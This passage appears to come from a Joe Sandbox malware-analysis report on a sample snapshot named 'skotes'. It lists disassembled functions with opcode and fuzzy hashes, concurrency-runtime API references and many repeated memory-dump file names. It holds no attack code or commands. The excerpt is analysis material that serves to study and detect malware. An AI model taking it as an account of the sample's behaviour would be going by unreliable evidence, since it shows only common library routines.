                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                              • Instruction ID: 31b515508320260662f635ad5702785156399e0e1222be57475953528d61ef06
                                                                                                                                              • Opcode Fuzzy Hash: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                              • Instruction Fuzzy Hash: 56012671700531BFCA15BB66E882E6EB72AFF84714740002FF40497612CB28FC6197A8
                                                                                                                                              Function 0042EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE6A
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE7C
                                                                                                                                                • Part of subcall function 0042EF29: _InternalDeleteHelper.LIBCONCRT ref: 0042EF3B
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE86
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 0042EE9F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                              • Instruction ID: 01845a4d8ec283163aadd0492ce9737526dbd67995a3e91ebe677bd62b2db9fe
                                                                                                                                              • Opcode Fuzzy Hash: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                              • Instruction Fuzzy Hash: 7201A271700531BBCA25AB63E9C2D6EBB6ABF44714742002FF90597612CB28FC519698
                                                                                                                                              Function 0042D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0C5
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0D7
                                                                                                                                                • Part of subcall function 0042C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0042C6C4
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0E1
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 0042D0FA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                              • Instruction ID: 755cb4a1e33a7fa83f33ee211f636d05fdd22ef1d8b5f684706db2c999db012a
                                                                                                                                              • Opcode Fuzzy Hash: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                              • Instruction Fuzzy Hash: 5E01F971B00531BFCA25BB62D8C2E7EB76ABF44718740442FF80097611CF28EC619798
                                                                                                                                              Function 004333C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
                                                                                                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 78362717-0
                                                                                                                                              • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                              • Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
                                                                                                                                              • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                              • Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5
                                                                                                                                              Function 00429510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519
                                                                                                                                                • Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486
                                                                                                                                              • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
                                                                                                                                              • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
